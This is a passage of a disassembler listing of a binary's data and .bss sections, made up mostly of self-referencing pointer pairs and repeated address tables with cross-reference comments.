dd 5 dup(0C4C4C4C4h), 6 dup(0C8C8C8C8h), 6 dup(0CCCCCCCCh)
dd 0D0D0CCCCh, 6 dup(0D0D0D0D0h)
db 2 dup(0D0h)
byte_4001C706 db 0 ; DATA XREF: sub_400029B8:loc_400029C3�r
align 4
dword_4001C708 dd 910000h ; sub_40002540:loc_4000261F�o ...
dword_4001C70C dd 910000h ; sub_400015DC+2D�w ...
dd 2 dup(0)
byte_4001C718 db 0 ; DATA XREF: sub_40001734+DC�w
; sub_40001734+F2�w ...
align 4
dword_4001C71C dd 95C430h ; sub_40001570+51�r ...
dword_4001C720 dd 4C420h ; sub_40001570+1B�r ...
dword_4001C724 dd 20008h ; sub_40001510+59�w ...
dword_4001C728 dd 0 ; sub_40001510+49�w ...
dd 2 dup(0)
dd 100h, 0Dh dup(0)
dd 20000h, 0Eh dup(0)
off_4001C7A8 dd offset off_4001C7A8 ; DATA XREF: sub_400014D0:loc_400014E0�o
; sub_40001510+19�o ...
dd offset off_4001C7A8
off_4001C7B0 dd offset off_4001C7B0 ; DATA XREF: .bss:off_4001C7B0�o
; .bss:4001C7B4�o
dd offset off_4001C7B0
off_4001C7B8 dd offset off_4001C7B8 ; DATA XREF: .bss:off_4001C7B8�o
; .bss:4001C7BC�o
dd offset off_4001C7B8
off_4001C7C0 dd offset off_4001C7C0 ; DATA XREF: .bss:off_4001C7C0�o
; .bss:4001C7C4�o
dd offset off_4001C7C0
off_4001C7C8 dd offset off_4001C7C8 ; DATA XREF: .bss:off_4001C7C8�o
; .bss:4001C7CC�o
dd offset off_4001C7C8
off_4001C7D0 dd offset off_4001C7D0 ; DATA XREF: .bss:off_4001C7D0�o
; .bss:4001C7D4�o
dd offset off_4001C7D0
off_4001C7D8 dd offset off_4001C7D8 ; DATA XREF: .bss:off_4001C7D8�o
; .bss:4001C7DC�o
dd offset off_4001C7D8
off_4001C7E0 dd offset off_4001C7E0 ; DATA XREF: .bss:off_4001C7E0�o
; .bss:4001C7E4�o
dd offset off_4001C7E0
off_4001C7E8 dd offset off_4001C7E8 ; DATA XREF: .bss:off_4001C7E8�o
; .bss:4001C7EC�o
dd offset off_4001C7E8
off_4001C7F0 dd offset off_4001C7F0 ; DATA XREF: .bss:off_4001C7F0�o
; .bss:4001C7F4�o
dd offset off_4001C7F0
off_4001C7F8 dd offset off_4001C7F8 ; DATA XREF: .bss:off_4001C7F8�o
; .bss:4001C7FC�o
dd offset off_4001C7F8
off_4001C800 dd offset off_4001C800 ; DATA XREF: .bss:off_4001C800�o
; .bss:4001C804�o
dd offset off_4001C800
off_4001C808 dd offset off_4001C808 ; DATA XREF: .bss:off_4001C808�o
; .bss:4001C80C�o
dd offset off_4001C808
off_4001C810 dd offset off_4001C810 ; DATA XREF: .bss:off_4001C810�o
; .bss:4001C814�o
dd offset off_4001C810
off_4001C818 dd offset off_4001C818 ; DATA XREF: .bss:off_4001C818�o
; .bss:4001C81C�o
dd offset off_4001C818
off_4001C820 dd offset off_4001C820 ; DATA XREF: .bss:off_4001C820�o
; .bss:4001C824�o
dd offset off_4001C820
off_4001C828 dd offset off_4001C828 ; DATA XREF: .bss:off_4001C828�o
; .bss:4001C82C�o
dd offset off_4001C828
off_4001C830 dd offset off_4001C830 ; DATA XREF: .bss:off_4001C830�o
; .bss:4001C834�o
dd offset off_4001C830
off_4001C838 dd offset off_4001C838 ; DATA XREF: .bss:off_4001C838�o
; .bss:4001C83C�o
dd offset off_4001C838
off_4001C840 dd offset off_4001C840 ; DATA XREF: .bss:off_4001C840�o
; .bss:4001C844�o
dd offset off_4001C840
off_4001C848 dd offset off_4001C848 ; DATA XREF: .bss:off_4001C848�o
; .bss:4001C84C�o
dd offset off_4001C848
off_4001C850 dd offset off_4001C850 ; DATA XREF: .bss:off_4001C850�o
; .bss:4001C854�o
dd offset off_4001C850
off_4001C858 dd offset off_4001C858 ; DATA XREF: .bss:off_4001C858�o
; .bss:4001C85C�o
dd offset off_4001C858
off_4001C860 dd offset off_4001C860 ; DATA XREF: .bss:off_4001C860�o
; .bss:4001C864�o
dd offset off_4001C860
off_4001C868 dd offset off_4001C868 ; DATA XREF: .bss:off_4001C868�o
; .bss:4001C86C�o
dd offset off_4001C868
off_4001C870 dd offset off_4001C870 ; DATA XREF: .bss:off_4001C870�o
; .bss:4001C874�o
dd offset off_4001C870
off_4001C878 dd offset off_4001C878 ; DATA XREF: .bss:off_4001C878�o
; .bss:4001C87C�o
dd offset off_4001C878
off_4001C880 dd offset off_4001C880 ; DATA XREF: .bss:off_4001C880�o
; .bss:4001C884�o
dd offset off_4001C880
off_4001C888 dd offset off_4001C888 ; DATA XREF: .bss:off_4001C888�o
; .bss:4001C88C�o
dd offset off_4001C888
off_4001C890 dd offset off_4001C890 ; DATA XREF: .bss:off_4001C890�o
; .bss:4001C894�o
dd offset off_4001C890
off_4001C898 dd offset off_4001C898 ; DATA XREF: .bss:off_4001C898�o
; .bss:4001C89C�o
dd offset off_4001C898
off_4001C8A0 dd offset off_4001C8A0 ; DATA XREF: .bss:off_4001C8A0�o
; .bss:4001C8A4�o
dd offset off_4001C8A0
off_4001C8A8 dd offset off_4001C8A8 ; DATA XREF: .bss:off_4001C8A8�o
; .bss:4001C8AC�o
dd offset off_4001C8A8
off_4001C8B0 dd offset off_4001C8B0 ; DATA XREF: .bss:off_4001C8B0�o
; .bss:4001C8B4�o
dd offset off_4001C8B0
off_4001C8B8 dd offset off_4001C8B8 ; DATA XREF: .bss:off_4001C8B8�o
; .bss:4001C8BC�o
dd offset off_4001C8B8
off_4001C8C0 dd offset off_4001C8C0 ; DATA XREF: .bss:off_4001C8C0�o
; .bss:4001C8C4�o
dd offset off_4001C8C0
off_4001C8C8 dd offset off_4001C8C8 ; DATA XREF: .bss:off_4001C8C8�o
; .bss:4001C8CC�o
dd offset off_4001C8C8
off_4001C8D0 dd offset off_4001C8D0 ; DATA XREF: .bss:off_4001C8D0�o
; .bss:4001C8D4�o
dd offset off_4001C8D0
off_4001C8D8 dd offset off_4001C8D8 ; DATA XREF: .bss:off_4001C8D8�o
; .bss:4001C8DC�o
dd offset off_4001C8D8
off_4001C8E0 dd offset off_4001C8E0 ; DATA XREF: .bss:off_4001C8E0�o
; .bss:4001C8E4�o
dd offset off_4001C8E0
off_4001C8E8 dd offset off_4001C8E8 ; DATA XREF: .bss:off_4001C8E8�o
; .bss:4001C8EC�o
dd offset off_4001C8E8
off_4001C8F0 dd offset off_4001C8F0 ; DATA XREF: .bss:off_4001C8F0�o
; .bss:4001C8F4�o
dd offset off_4001C8F0
off_4001C8F8 dd offset off_4001C8F8 ; DATA XREF: .bss:off_4001C8F8�o
; .bss:4001C8FC�o
dd offset off_4001C8F8
off_4001C900 dd offset off_4001C900 ; DATA XREF: .bss:off_4001C900�o
; .bss:4001C904�o
dd offset off_4001C900
off_4001C908 dd offset off_4001C908 ; DATA XREF: .bss:off_4001C908�o
; .bss:4001C90C�o
dd offset off_4001C908
off_4001C910 dd offset off_4001C910 ; DATA XREF: .bss:off_4001C910�o
; .bss:4001C914�o
dd offset off_4001C910
off_4001C918 dd offset off_4001C918 ; DATA XREF: .bss:off_4001C918�o
; .bss:4001C91C�o
dd offset off_4001C918
off_4001C920 dd offset off_4001C920 ; DATA XREF: .bss:off_4001C920�o
; .bss:4001C924�o
dd offset off_4001C920
off_4001C928 dd offset off_4001C928 ; DATA XREF: .bss:off_4001C928�o
; .bss:4001C92C�o
dd offset off_4001C928
off_4001C930 dd offset off_4001C930 ; DATA XREF: .bss:off_4001C930�o
; .bss:4001C934�o
dd offset off_4001C930
off_4001C938 dd offset off_4001C938 ; DATA XREF: .bss:off_4001C938�o
; .bss:4001C93C�o
dd offset off_4001C938
off_4001C940 dd offset off_4001C940 ; DATA XREF: .bss:off_4001C940�o
; .bss:4001C944�o
dd offset off_4001C940
off_4001C948 dd offset off_4001C948 ; DATA XREF: .bss:off_4001C948�o
; .bss:4001C94C�o
dd offset off_4001C948
off_4001C950 dd offset off_4001C950 ; DATA XREF: .bss:off_4001C950�o
; .bss:4001C954�o
dd offset off_4001C950
off_4001C958 dd offset off_4001C958 ; DATA XREF: .bss:off_4001C958�o
; .bss:4001C95C�o
dd offset off_4001C958
off_4001C960 dd offset off_4001C960 ; DATA XREF: .bss:off_4001C960�o
; .bss:4001C964�o
dd offset off_4001C960
off_4001C968 dd offset off_4001C968 ; DATA XREF: .bss:off_4001C968�o
; .bss:4001C96C�o
dd offset off_4001C968
off_4001C970 dd offset off_4001C970 ; DATA XREF: .bss:off_4001C970�o
; .bss:4001C974�o
dd offset off_4001C970
off_4001C978 dd offset off_4001C978 ; DATA XREF: .bss:off_4001C978�o
; .bss:4001C97C�o
dd offset off_4001C978
off_4001C980 dd offset off_4001C980 ; DATA XREF: .bss:off_4001C980�o
; .bss:4001C984�o
dd offset off_4001C980
off_4001C988 dd offset off_4001C988 ; DATA XREF: .bss:off_4001C988�o
; .bss:4001C98C�o
dd offset off_4001C988
off_4001C990 dd offset off_4001C990 ; DATA XREF: .bss:off_4001C990�o
; .bss:4001C994�o
dd offset off_4001C990
off_4001C998 dd offset off_4001C998 ; DATA XREF: .bss:off_4001C998�o
; .bss:4001C99C�o
dd offset off_4001C998
off_4001C9A0 dd offset off_4001C9A0 ; DATA XREF: .bss:off_4001C9A0�o
; .bss:4001C9A4�o
dd offset off_4001C9A0
off_4001C9A8 dd offset off_4001C9A8 ; DATA XREF: .bss:off_4001C9A8�o
; .bss:4001C9AC�o
dd offset off_4001C9A8
off_4001C9B0 dd offset off_4001C9B0 ; DATA XREF: .bss:off_4001C9B0�o
; .bss:4001C9B4�o
dd offset off_4001C9B0
off_4001C9B8 dd offset off_4001C9B8 ; DATA XREF: .bss:off_4001C9B8�o
; .bss:4001C9BC�o
dd offset off_4001C9B8
off_4001C9C0 dd offset off_4001C9C0 ; DATA XREF: .bss:off_4001C9C0�o
; .bss:4001C9C4�o
dd offset off_4001C9C0
off_4001C9C8 dd offset off_4001C9C8 ; DATA XREF: .bss:off_4001C9C8�o
; .bss:4001C9CC�o
dd offset off_4001C9C8
off_4001C9D0 dd offset off_4001C9D0 ; DATA XREF: .bss:off_4001C9D0�o
; .bss:4001C9D4�o
dd offset off_4001C9D0
off_4001C9D8 dd offset off_4001C9D8 ; DATA XREF: .bss:off_4001C9D8�o
; .bss:4001C9DC�o
dd offset off_4001C9D8
off_4001C9E0 dd offset off_4001C9E0 ; DATA XREF: .bss:off_4001C9E0�o
; .bss:4001C9E4�o
dd offset off_4001C9E0
off_4001C9E8 dd offset off_4001C9E8 ; DATA XREF: .bss:off_4001C9E8�o
; .bss:4001C9EC�o
dd offset off_4001C9E8
off_4001C9F0 dd offset off_4001C9F0 ; DATA XREF: .bss:off_4001C9F0�o
; .bss:4001C9F4�o
dd offset off_4001C9F0
off_4001C9F8 dd offset off_4001C9F8 ; DATA XREF: .bss:off_4001C9F8�o
; .bss:4001C9FC�o
dd offset off_4001C9F8
off_4001CA00 dd offset off_4001CA00 ; DATA XREF: .bss:off_4001CA00�o
; .bss:4001CA04�o
dd offset off_4001CA00
off_4001CA08 dd offset off_4001CA08 ; DATA XREF: .bss:off_4001CA08�o
; .bss:4001CA0C�o
dd offset off_4001CA08
off_4001CA10 dd offset off_4001CA10 ; DATA XREF: .bss:off_4001CA10�o
; .bss:4001CA14�o
dd offset off_4001CA10
off_4001CA18 dd offset off_4001CA18 ; DATA XREF: .bss:off_4001CA18�o
; .bss:4001CA1C�o
dd offset off_4001CA18
off_4001CA20 dd offset off_4001CA20 ; DATA XREF: .bss:off_4001CA20�o
; .bss:4001CA24�o
dd offset off_4001CA20
off_4001CA28 dd offset off_4001CA28 ; DATA XREF: .bss:off_4001CA28�o
; .bss:4001CA2C�o
dd offset off_4001CA28
off_4001CA30 dd offset off_4001CA30 ; DATA XREF: .bss:off_4001CA30�o
; .bss:4001CA34�o
dd offset off_4001CA30
off_4001CA38 dd offset off_4001CA38 ; DATA XREF: .bss:off_4001CA38�o
; .bss:4001CA3C�o
dd offset off_4001CA38
off_4001CA40 dd offset off_4001CA40 ; DATA XREF: .bss:off_4001CA40�o
; .bss:4001CA44�o
dd offset off_4001CA40
off_4001CA48 dd offset off_4001CA48 ; DATA XREF: .bss:off_4001CA48�o
; .bss:4001CA4C�o
dd offset off_4001CA48
off_4001CA50 dd offset off_4001CA50 ; DATA XREF: .bss:off_4001CA50�o
; .bss:4001CA54�o
dd offset off_4001CA50
off_4001CA58 dd offset off_4001CA58 ; DATA XREF: .bss:off_4001CA58�o
; .bss:4001CA5C�o
dd offset off_4001CA58
off_4001CA60 dd offset off_4001CA60 ; DATA XREF: .bss:off_4001CA60�o
; .bss:4001CA64�o
dd offset off_4001CA60
off_4001CA68 dd offset off_4001CA68 ; DATA XREF: .bss:off_4001CA68�o
; .bss:4001CA6C�o
dd offset off_4001CA68
off_4001CA70 dd offset off_4001CA70 ; DATA XREF: .bss:off_4001CA70�o
; .bss:4001CA74�o
dd offset off_4001CA70
off_4001CA78 dd offset off_4001CA78 ; DATA XREF: .bss:off_4001CA78�o
; .bss:4001CA7C�o
dd offset off_4001CA78
off_4001CA80 dd offset off_4001CA80 ; DATA XREF: .bss:off_4001CA80�o
; .bss:4001CA84�o
dd offset off_4001CA80
off_4001CA88 dd offset off_4001CA88 ; DATA XREF: .bss:off_4001CA88�o
; .bss:4001CA8C�o
dd offset off_4001CA88
off_4001CA90 dd offset off_4001CA90 ; DATA XREF: .bss:off_4001CA90�o
; .bss:4001CA94�o
dd offset off_4001CA90
off_4001CA98 dd offset off_4001CA98 ; DATA XREF: .bss:off_4001CA98�o
; .bss:4001CA9C�o
dd offset off_4001CA98
off_4001CAA0 dd offset off_4001CAA0 ; DATA XREF: .bss:off_4001CAA0�o
; .bss:4001CAA4�o
dd offset off_4001CAA0
off_4001CAA8 dd offset off_4001CAA8 ; DATA XREF: .bss:off_4001CAA8�o
; .bss:4001CAAC�o
dd offset off_4001CAA8
off_4001CAB0 dd offset off_4001CAB0 ; DATA XREF: .bss:off_4001CAB0�o
; .bss:4001CAB4�o
dd offset off_4001CAB0
off_4001CAB8 dd offset off_4001CAB8 ; DATA XREF: .bss:off_4001CAB8�o
; .bss:4001CABC�o
dd offset off_4001CAB8
off_4001CAC0 dd offset off_4001CAC0 ; DATA XREF: .bss:off_4001CAC0�o
; .bss:4001CAC4�o
dd offset off_4001CAC0
off_4001CAC8 dd offset off_4001CAC8 ; DATA XREF: .bss:off_4001CAC8�o
; .bss:4001CACC�o
dd offset off_4001CAC8
off_4001CAD0 dd offset off_4001CAD0 ; DATA XREF: .bss:off_4001CAD0�o
; .bss:4001CAD4�o
dd offset off_4001CAD0
off_4001CAD8 dd offset off_4001CAD8 ; DATA XREF: .bss:off_4001CAD8�o
; .bss:4001CADC�o
dd offset off_4001CAD8
off_4001CAE0 dd offset off_4001CAE0 ; DATA XREF: .bss:off_4001CAE0�o
; .bss:4001CAE4�o
dd offset off_4001CAE0
dd 2 dup(986A60h), 2 dup(4001CAF0h), 2 dup(4001CAF8h)
dd 2 dup(4001CB00h), 2 dup(4001CB08h), 2 dup(4001CB10h)
dd 2 dup(4001CB18h), 2 dup(4001CB20h), 2 dup(4001CB28h)
dd 2 dup(4001CB30h), 2 dup(4001CB38h), 2 dup(4001CB40h)
dd 2 dup(4001CB48h), 2 dup(4001CB50h), 2 dup(4001CB58h)
dd 2 dup(4001CB60h), 2 dup(4001CB68h), 2 dup(4001CB70h)
dd 2 dup(4001CB78h), 2 dup(4001CB80h), 2 dup(4001CB88h)
dd 2 dup(4001CB90h), 2 dup(4001CB98h), 2 dup(4001CBA0h)
dd 2 dup(4001CBA8h), 2 dup(4001CBB0h), 2 dup(4001CBB8h)
dd 2 dup(4001CBC0h), 2 dup(4001CBC8h), 2 dup(4001CBD0h)
dd 2 dup(4001CBD8h), 2 dup(4001CBE0h), 2 dup(4001CBE8h)
dd 2 dup(4001CBF0h), 2 dup(4001CBF8h), 2 dup(4001CC00h)
dd 2 dup(4001CC08h), 2 dup(4001CC10h), 2 dup(4001CC18h)
dd 2 dup(4001CC20h), 2 dup(4001CC28h), 2 dup(4001CC30h)
dd 2 dup(4001CC38h), 2 dup(4001CC40h), 2 dup(4001CC48h)
dd 2 dup(4001CC50h), 2 dup(4001CC58h), 2 dup(4001CC60h)
dd 2 dup(4001CC68h), 2 dup(4001CC70h), 2 dup(4001CC78h)
dd 2 dup(4001CC80h), 2 dup(4001CC88h), 2 dup(4001CC90h)
dd 2 dup(4001CC98h), 2 dup(4001CCA0h), 2 dup(4001CCA8h)
dd 2 dup(4001CCB0h), 2 dup(4001CCB8h), 2 dup(4001CCC0h)
dd 2 dup(4001CCC8h), 2 dup(4001CCD0h), 2 dup(4001CCD8h)
dd 2 dup(4001CCE0h), 2 dup(4001CCE8h), 2 dup(4001CCF0h)
dd 2 dup(4001CCF8h), 2 dup(4001CD00h), 2 dup(4001CD08h)
dd 2 dup(4001CD10h), 2 dup(4001CD18h), 2 dup(4001CD20h)
dd 2 dup(4001CD28h), 2 dup(4001CD30h), 2 dup(4001CD38h)
dd 2 dup(4001CD40h), 2 dup(4001CD48h), 2 dup(4001CD50h)
dd 2 dup(4001CD58h), 2 dup(4001CD60h), 2 dup(4001CD68h)
dd 2 dup(4001CD70h), 2 dup(4001CD78h), 2 dup(4001CD80h)
dd 2 dup(4001CD88h), 2 dup(4001CD90h), 2 dup(4001CD98h)
dd 2 dup(4001CDA0h), 2 dup(4001CDA8h), 2 dup(4001CDB0h)
dd 2 dup(4001CDB8h), 2 dup(4001CDC0h), 2 dup(4001CDC8h)
dd 2 dup(4001CDD0h), 2 dup(4001CDD8h), 2 dup(4001CDE0h)
dd 2 dup(4001CDE8h), 2 dup(4001CDF0h), 2 dup(4001CDF8h)
dd 2 dup(4001CE00h), 2 dup(4001CE08h), 2 dup(4001CE10h)
dd 2 dup(4001CE18h), 2 dup(4001CE20h), 2 dup(4001CE28h)
dd 2 dup(4001CE30h), 2 dup(4001CE38h), 2 dup(4001CE40h)
dd 2 dup(4001CE48h), 2 dup(4001CE50h), 2 dup(4001CE58h)
dd 2 dup(4001CE60h), 2 dup(4001CE68h), 2 dup(4001CE70h)
dd 2 dup(4001CE78h), 2 dup(4001CE80h), 2 dup(4001CE88h)
dd 2 dup(4001CE90h), 2 dup(4001CE98h), 2 dup(4001CEA0h)
dd 2 dup(4001CEA8h), 2 dup(4001CEB0h), 2 dup(4001CEB8h)
dd 2 dup(4001CEC0h), 2 dup(4001CEC8h), 2 dup(4001CED0h)
dd 2 dup(4001CED8h), 2 dup(4001CEE0h), 2 dup(4001CEE8h)
dd 2 dup(4001CEF0h), 2 dup(4001CEF8h), 2 dup(4001CF00h)
dd 2 dup(4001CF08h), 2 dup(4001CF10h), 2 dup(4001CF18h)
dd 2 dup(4001CF20h), 2 dup(4001CF28h), 2 dup(4001CF30h)
dd 2 dup(4001CF38h), 2 dup(4001CF40h), 2 dup(4001CF48h)
dd 2 dup(4001CF50h), 2 dup(4001CF58h), 2 dup(4001CF60h)
dd 2 dup(4001CF68h), 2 dup(4001CF70h), 2 dup(4001CF78h)
dd 2 dup(4001CF80h), 2 dup(4001CF88h), 2 dup(4001CF90h)
dd 2 dup(4001CF98h), 2 dup(4001CFA0h), 2 dup(4001CFA8h)
dd 2 dup(4001CFB0h), 2 dup(4001CFB8h), 2 dup(4001CFC0h)
dd 2 dup(4001CFC8h), 2 dup(4001CFD0h), 2 dup(4001CFD8h)
dd 2 dup(4001CFE0h), 2 dup(4001CFE8h), 2 dup(4001CFF0h)
dd 2 dup(4001CFF8h), 2 dup(4001D000h), 2 dup(4001D008h)
dd 2 dup(4001D010h), 2 dup(4001D018h), 2 dup(4001D020h)
dd 2 dup(4001D028h), 2 dup(4001D030h), 2 dup(4001D038h)
dd 2 dup(4001D040h), 2 dup(4001D048h), 2 dup(4001D050h)
dd 2 dup(4001D058h), 2 dup(4001D060h), 2 dup(4001D068h)
dd 2 dup(4001D070h), 2 dup(4001D078h), 2 dup(4001D080h)
dd 2 dup(4001D088h), 2 dup(4001D090h), 2 dup(4001D098h)
dd 2 dup(4001D0A0h), 2 dup(4001D0A8h), 2 dup(4001D0B0h)
dd 2 dup(4001D0B8h), 2 dup(4001D0C0h), 2 dup(4001D0C8h)
dd 2 dup(4001D0D0h), 2 dup(4001D0D8h), 2 dup(4001D0E0h)
dd 2 dup(4001D0E8h), 2 dup(4001D0F0h), 2 dup(4001D0F8h)
dd 2 dup(4001D100h), 2 dup(4001D108h), 2 dup(4001D110h)
dd 2 dup(4001D118h), 2 dup(4001D120h), 2 dup(4001D128h)
dd 2 dup(4001D130h), 2 dup(4001D138h), 2 dup(4001D140h)
dd 2 dup(4001D148h), 2 dup(4001D150h), 2 dup(4001D158h)
dd 2 dup(4001D160h), 2 dup(4001D168h), 2 dup(4001D170h)
dd 2 dup(4001D178h), 2 dup(4001D180h), 2 dup(4001D188h)
dd 2 dup(4001D190h), 2 dup(4001D198h), 2 dup(4001D1A0h)
dd 2 dup(4001D1A8h), 2 dup(4001D1B0h), 2 dup(4001D1B8h)
dd 2 dup(4001D1C0h), 2 dup(4001D1C8h), 2 dup(4001D1D0h)
dd 2 dup(4001D1D8h), 2 dup(4001D1E0h), 2 dup(4001D1E8h)
dd 2 dup(4001D1F0h), 2 dup(4001D1F8h), 2 dup(4001D200h)
dd 2 dup(4001D208h), 2 dup(4001D210h), 2 dup(4001D218h)
dd 2 dup(4001D220h), 2 dup(4001D228h), 2 dup(4001D230h)
dd 2 dup(4001D238h), 2 dup(4001D240h), 2 dup(4001D248h)
dd 2 dup(4001D250h), 2 dup(4001D258h), 2 dup(4001D260h)
dd 2 dup(4001D268h), 2 dup(4001D270h), 2 dup(4001D278h)
dd 2 dup(4001D280h), 2 dup(4001D288h), 2 dup(4001D290h)
dd 2 dup(4001D298h), 2 dup(4001D2A0h), 2 dup(4001D2A8h)
dd 2 dup(4001D2B0h), 2 dup(4001D2B8h), 2 dup(4001D2C0h)
dd 2 dup(4001D2C8h), 2 dup(4001D2D0h), 2 dup(4001D2D8h)
dd 2 dup(4001D2E0h), 2 dup(4001D2E8h), 2 dup(4001D2F0h)
dd 2 dup(4001D2F8h), 2 dup(4001D300h), 2 dup(4001D308h)
dd 2 dup(4001D310h), 2 dup(4001D318h), 2 dup(4001D320h)
dd 2 dup(4001D328h), 2 dup(4001D330h), 2 dup(4001D338h)
dd 2 dup(4001D340h), 2 dup(4001D348h), 2 dup(4001D350h)
dd 2 dup(4001D358h), 2 dup(4001D360h), 2 dup(4001D368h)
dd 2 dup(4001D370h), 2 dup(4001D378h), 2 dup(4001D380h)
dd 2 dup(4001D388h), 2 dup(4001D390h), 2 dup(4001D398h)
dd 2 dup(4001D3A0h), 2 dup(4001D3A8h), 2 dup(4001D3B0h)
dd 2 dup(4001D3B8h), 2 dup(4001D3C0h), 2 dup(4001D3C8h)
dd 2 dup(4001D3D0h), 2 dup(4001D3D8h), 2 dup(4001D3E0h)
dd 2 dup(4001D3E8h), 2 dup(4001D3F0h), 2 dup(4001D3F8h)
dd 2 dup(4001D400h), 2 dup(4001D408h), 2 dup(4001D410h)
dd 2 dup(4001D418h), 2 dup(4001D420h), 2 dup(4001D428h)
dd 2 dup(4001D430h), 2 dup(4001D438h), 2 dup(4001D440h)
dd 2 dup(4001D448h), 2 dup(4001D450h), 2 dup(4001D458h)
dd 2 dup(4001D460h), 2 dup(4001D468h), 2 dup(4001D470h)
dd 2 dup(4001D478h), 2 dup(4001D480h), 2 dup(4001D488h)
dd 2 dup(4001D490h), 2 dup(4001D498h), 2 dup(4001D4A0h)
dd 2 dup(4001D4A8h), 2 dup(4001D4B0h), 2 dup(4001D4B8h)
dd 2 dup(4001D4C0h), 2 dup(4001D4C8h), 2 dup(4001D4D0h)
dd 2 dup(4001D4D8h), 2 dup(4001D4E0h), 2 dup(4001D4E8h)
dd 2 dup(4001D4F0h), 2 dup(4001D4F8h), 2 dup(4001D500h)
dd 2 dup(4001D508h), 2 dup(4001D510h), 2 dup(4001D518h)
dd 2 dup(4001D520h), 2 dup(4001D528h), 2 dup(4001D530h)
dd 2 dup(4001D538h), 2 dup(4001D540h), 2 dup(4001D548h)
dd 2 dup(4001D550h), 2 dup(4001D558h), 2 dup(4001D560h)
dd 2 dup(4001D568h), 2 dup(4001D570h), 2 dup(4001D578h)
dd 2 dup(4001D580h), 2 dup(4001D588h), 2 dup(4001D590h)
dd 2 dup(4001D598h), 2 dup(4001D5A0h), 2 dup(4001D5A8h)
dd 2 dup(4001D5B0h), 2 dup(4001D5B8h), 2 dup(4001D5C0h)
dd 2 dup(4001D5C8h), 2 dup(4001D5D0h), 2 dup(4001D5D8h)
dd 2 dup(4001D5E0h), 2 dup(4001D5E8h), 2 dup(4001D5F0h)
dd 2 dup(4001D5F8h), 2 dup(4001D600h), 2 dup(4001D608h)
dd 2 dup(4001D610h), 2 dup(4001D618h), 2 dup(4001D620h)
dd 2 dup(4001D628h), 2 dup(4001D630h), 2 dup(4001D638h)
dd 2 dup(4001D640h), 2 dup(4001D648h), 2 dup(4001D650h)
dd 2 dup(4001D658h), 2 dup(4001D660h), 2 dup(4001D668h)
dd 2 dup(4001D670h), 2 dup(4001D678h), 2 dup(4001D680h)
dd 2 dup(4001D688h), 2 dup(4001D690h), 2 dup(4001D698h)
dd 2 dup(4001D6A0h), 2 dup(4001D6A8h), 2 dup(4001D6B0h)
dd 2 dup(4001D6B8h), 2 dup(4001D6C0h), 2 dup(4001D6C8h)
dd 2 dup(4001D6D0h), 2 dup(4001D6D8h), 2 dup(4001D6E0h)
dd 2 dup(4001D6E8h), 2 dup(4001D6F0h), 2 dup(4001D6F8h)
dd 2 dup(4001D700h), 2 dup(4001D708h), 2 dup(4001D710h)
dd 2 dup(4001D718h), 2 dup(4001D720h), 2 dup(4001D728h)
dd 2 dup(4001D730h), 2 dup(4001D738h), 2 dup(4001D740h)
dd 2 dup(4001D748h), 2 dup(4001D750h), 2 dup(4001D758h)
dd 2 dup(4001D760h), 2 dup(4001D768h), 2 dup(4001D770h)
dd 2 dup(4001D778h), 2 dup(4001D780h), 2 dup(4001D788h)
dd 2 dup(4001D790h), 2 dup(4001D798h), 2 dup(4001D7A0h)
dd 2 dup(4001D7A8h), 2 dup(4001D7B0h), 2 dup(4001D7B8h)
dd 2 dup(4001D7C0h), 2 dup(4001D7C8h), 2 dup(4001D7D0h)
dd 2 dup(4001D7D8h), 2 dup(4001D7E0h), 2 dup(4001D7E8h)
dd 2 dup(4001D7F0h), 2 dup(4001D7F8h), 2 dup(4001D800h)
dd 2 dup(4001D808h), 2 dup(4001D810h), 2 dup(4001D818h)
dd 2 dup(4001D820h), 2 dup(4001D828h), 2 dup(4001D830h)
dd 2 dup(4001D838h), 2 dup(4001D840h), 2 dup(4001D848h)
dd 2 dup(4001D850h), 2 dup(4001D858h), 2 dup(4001D860h)
dd 2 dup(4001D868h), 2 dup(4001D870h), 2 dup(4001D878h)
dd 2 dup(4001D880h), 2 dup(4001D888h), 2 dup(4001D890h)
dd 2 dup(4001D898h), 2 dup(4001D8A0h), 2 dup(4001D8A8h)
dd 2 dup(4001D8B0h), 2 dup(4001D8B8h), 2 dup(4001D8C0h)
dd 2 dup(4001D8C8h), 2 dup(4001D8D0h), 2 dup(4001D8D8h)
dd 2 dup(4001D8E0h), 2 dup(4001D8E8h), 2 dup(4001D8F0h)
dd 2 dup(4001D8F8h), 2 dup(4001D900h), 2 dup(4001D908h)
dd 2 dup(4001D910h), 2 dup(4001D918h), 2 dup(4001D920h)
dd 2 dup(4001D928h), 2 dup(9F29C0h), 2 dup(4001D938h)
dd 2 dup(4001D940h), 2 dup(4001D948h), 2 dup(4001D950h)
dd 2 dup(4001D958h), 2 dup(4001D960h), 2 dup(4001D968h)
dd 2 dup(4001D970h), 2 dup(4001D978h), 2 dup(4001D980h)
dd 2 dup(4001D988h), 2 dup(4001D990h), 2 dup(4001D998h)
dd 2 dup(4001D9A0h), 2 dup(4001D9A8h), 2 dup(4001D9B0h)
dd 2 dup(4001D9B8h), 2 dup(4001D9C0h), 2 dup(4001D9C8h)
dd 2 dup(4001D9D0h), 2 dup(4001D9D8h), 2 dup(4001D9E0h)
dd 2 dup(4001D9E8h), 2 dup(4001D9F0h), 2 dup(4001D9F8h)
dd 2 dup(4001DA00h), 2 dup(4001DA08h), 2 dup(4001DA10h)
dd 2 dup(4001DA18h), 2 dup(4001DA20h), 2 dup(4001DA28h)
dd 2 dup(4001DA30h), 2 dup(4001DA38h), 2 dup(4001DA40h)
dd 2 dup(4001DA48h), 2 dup(4001DA50h), 2 dup(4001DA58h)
dd 2 dup(4001DA60h), 2 dup(4001DA68h), 2 dup(4001DA70h)
dd 2 dup(4001DA78h), 2 dup(4001DA80h), 2 dup(4001DA88h)
dd 2 dup(4001DA90h), 2 dup(4001DA98h), 2 dup(4001DAA0h)
dd 2 dup(4001DAA8h), 2 dup(4001DAB0h), 2 dup(4001DAB8h)
dd 2 dup(4001DAC0h), 2 dup(4001DAC8h), 2 dup(4001DAD0h)
dd 2 dup(4001DAD8h), 4001DAE0h
dd 4001DAE0h, 2 dup(4001DAE8h), 2 dup(4001DAF0h), 2 dup(4001DAF8h)
dd 2 dup(4001DB00h), 2 dup(4001DB08h), 2 dup(4001DB10h)
dd 2 dup(4001DB18h), 2 dup(4001DB20h), 2 dup(4001DB28h)
dd 2 dup(4001DB30h), 2 dup(4001DB38h), 2 dup(4001DB40h)
dd 2 dup(4001DB48h), 2 dup(4001DB50h), 2 dup(4001DB58h)
dd 2 dup(4001DB60h), 2 dup(4001DB68h), 2 dup(4001DB70h)
